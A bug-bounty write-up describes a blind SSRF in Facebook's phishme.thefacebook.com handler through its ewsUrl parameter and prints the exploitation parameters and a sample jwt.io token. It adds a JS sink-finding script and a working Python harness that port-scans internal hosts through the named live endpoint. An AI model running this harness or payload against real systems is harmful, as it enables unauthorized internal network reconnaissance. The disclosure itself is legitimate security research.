$10000 Facebook SSRF (Bug Bounty)

Subdomain enumeration + file bruteforcing + JS analysis = $10K blind SSRF

This is a write-up about an SSRF vulnerability I found on Facebook.

The vulnerability could have allowed a malicious user to make a Facebook server send requests into the Facebook corporate network. It was a blind SSRF: the response from the internal host is never returned to the attacker, so only side channels (error messages, timing) reveal what the server-side request hit.

1) Subdomains Enumeration

If you have read my previous write-up, « Story of a weird vulnerability I found on Facebook », you already know how much I love these 403 errors. A 403 means the host is alive and serving something, which makes it a good candidate for file bruteforcing.

2) Javascript File Bruteforcing

By bruteforcing file names on phishme.thefacebook.com, I found a hidden Home.js file (https://phishme.thefacebook.com/Home.js) that was not linked from anywhere.

3) Code Review of Home.js

By digging deeper into the code, I found that this function was called as follows:

Util.sendPhishRequest('PhishGetItemData.ashx', { itemId: itemId, ewsUrl: ewsUrl, token: token })

The interesting parameter is ewsUrl (from its name, the URL of an Exchange Web Services endpoint): a client-supplied URL that is sent to the server-side PhishGetItemData.ashx handler, which then requests it itself.
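As an added example of the JS analysis step (this is not code from the write-up and not part of Home.js), the following Python script makes a first pass over a JavaScript file and lists calls of the shape wrapper('handler', { ... }), flagging parameters whose names suggest the server will fetch them. The sample JS is constructed to resemble the single call quoted above; the wrapper body and the loadItem() function are assumptions, and the regex is a heuristic, not a JavaScript parser.

```python
import re

# Constructed sample modelled on the one call the write-up quotes from Home.js.
# It is NOT the real file; the wrapper body and loadItem() are assumptions.
SAMPLE_JS = """
var Util = Util || {};
Util.sendPhishRequest = function (handler, data, callback) {
    $.ajax({ url: '/' + handler, type: 'POST', data: JSON.stringify(data), success: callback });
};
function loadItem(itemId, ewsUrl, token) {
    Util.sendPhishRequest('PhishGetItemData.ashx', { itemId: itemId, ewsUrl: ewsUrl, token: token }, render);
}
"""

# A call whose first argument is a string (the handler/path) and whose second
# is an object literal (the parameters): the shape of most ajax wrappers.
CALL_RE = re.compile(r"""
    (?P<func>[A-Za-z_$][\w$]*(?:\.[\w$]+)*)   # Util.sendPhishRequest
    \s*\(\s*
    ['"](?P<handler>[^'"]+)['"]              # 'PhishGetItemData.ashx'
    \s*,\s*
    \{(?P<obj>[^}]*)\}                       # { itemId: itemId, ... }
""", re.VERBOSE)
STRING_RE = re.compile(r"'[^']*'|\"[^\"]*\"")        # literals may contain ':'
KEY_RE = re.compile(r"(?<![\w$])([A-Za-z_$][\w$]*)\s*:")
# Parameter names that usually mean "the server will fetch this".
URL_LIKE = re.compile(
    r"url|uri|host|endpoint|callback|redirect|target|link|src|proxy|feed", re.I
)


def object_keys(obj_literal):
    """Keys of a flat object literal, ignoring anything inside string values."""
    return KEY_RE.findall(STRING_RE.sub("''", obj_literal))


def find_request_sinks(js_source):
    """Every wrapper call found, with its parameters and the URL-like ones."""
    sinks = []
    for match in CALL_RE.finditer(js_source):
        params = object_keys(match.group("obj"))
        sinks.append({
            "function": match.group("func"),
            "handler": match.group("handler"),
            "params": params,
            "url_like": [p for p in params if URL_LIKE.search(p)],
        })
    return sinks


if __name__ == "__main__":
    import sys
    source = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_JS
    for sink in find_request_sinks(source):
        flag = " <-- SSRF candidate" if sink["url_like"] else ""
        print(f"{sink['function']}({sink['handler']!r}) params={sink['params']}"
              f" url-like={sink['url_like']}{flag}")
```

Run it as `python sinks.py Home.js` against a downloaded file; with no argument it scans the constructed sample and flags ewsUrl. String values are blanked before key extraction so a literal such as 'http://...' is not mistaken for a key.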

Exploitation:

Pointing ewsUrl at a loopback or internal address and port makes the handler issue the request on the attacker's behalf. The parameters I used:

itemId: 123
ewsUrl: http://127.0.0.1:PORT
token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWV9.TJVA95OrM7E2cBab30RMHrHDcEfxjoYZgeFONFh7Hg

The token value is the stock example JWT from jwt.io, not a real credential; the handler still sent the request with it.

POC:

The stack traces in the error responses helped to gather information about the internal requests being sent. Because the SSRF is blind, the body of the internal host's response is never returned, but the error the server leaks (connection refused, timeout, or a parser choking on whatever answered) differs depending on whether the chosen port was open, closed or filtered.
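As an added example (not code from the write-up or from the target), here is a small Python harness that turns the ewsUrl parameter into a blind port probe in the way the stack-trace observation above suggests: each port is classified from the error text the server leaks and from the round-trip time, since the internal response itself never comes back. The handler and parameter names are the ones quoted from Home.js; the request method (form-encoded POST), the .NET-style error wording and the sample responses are assumptions. The sender is injectable so the classification can be exercised offline with constructed responses.

```python
import socket
import time
import urllib.error
import urllib.request
from urllib.parse import urlencode

# Handler and parameter names are the ones the write-up quotes from Home.js.
# Request method (form-encoded POST) and the error wording are assumptions.
TARGET = "https://phishme.thefacebook.com/PhishGetItemData.ashx"
# The token used in the write-up: the stock jwt.io example, not a real credential.
SAMPLE_JWT = (
    "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9."
    "eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWV9."
    "TJVA95OrM7E2cBab30RMHrHDcEfxjoYZgeFONFh7Hg"
)
SLOW_SECONDS = 5.0      # slower than this with no error text: treat as dropped
REQUEST_TIMEOUT = 15    # seconds before the real sender gives up


def build_params(port, host="127.0.0.1", item_id="123", token=SAMPLE_JWT):
    """One probe's parameters; ewsUrl is the attacker-controlled URL."""
    return {"itemId": item_id, "ewsUrl": f"http://{host}:{port}", "token": token}


def classify(status, body, elapsed):
    """Infer a port state from what the server leaks about its own request.

    The internal response is never returned (blind SSRF); the signal is the
    leaked error text, then timing. The phrases are typical .NET socket/XML
    errors and are an assumption, not quoted from the real stack traces.
    """
    text = body.lower()
    if "actively refused" in text or "connection refused" in text:
        return "closed"          # TCP RST: nothing listening
    if "timed out" in text:
        return "filtered"        # the server's own connect attempt hung
    if "exception" in text or "stack trace" in text:
        return "open"            # something answered and the parser choked
    if elapsed > SLOW_SECONDS:
        return "filtered"        # no detail leaked, but it took far too long
    return "unknown"             # no error leaked: open or silently handled


def probe_ports(send, ports, host="127.0.0.1"):
    """Probe each port through the SSRF. `send(params)` returns (status, body)."""
    results = {}
    for port in ports:
        started = time.monotonic()
        status, body = send(build_params(port, host))
        results[port] = classify(status, body, time.monotonic() - started)
    return results


def summarize(results):
    """Group ports by state, e.g. {'open': [80, 443], 'closed': [22]}."""
    grouped = {}
    for port, state in sorted(results.items()):
        grouped.setdefault(state, []).append(port)
    return grouped


def http_send(params):
    """Real sender: POST the parameters to TARGET, return (status, body)."""
    request = urllib.request.Request(
        TARGET, data=urlencode(params).encode(), method="POST"
    )
    try:
        with urllib.request.urlopen(request, timeout=REQUEST_TIMEOUT) as resp:
            return resp.getcode(), resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        return err.code, err.read().decode("utf-8", "replace")
    except (urllib.error.URLError, socket.timeout) as err:
        return 0, str(err)


if __name__ == "__main__":
    print(summarize(probe_ports(http_send, [22, 80, 443, 445, 3389, 8080])))
```

Only run the real sender against a target you are authorized to test. Before trusting the classification, calibrate it by probing one port you know is closed and one you know is open and checking that the leaked messages match the phrases in classify(); the phrases above are a starting point, not a universal signature.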

Timeline:

Amine Aboud

Twitter: https://twitter.com/amineaboud

Entrepreneur & cyber security enthusiast doing bug bounty for fun.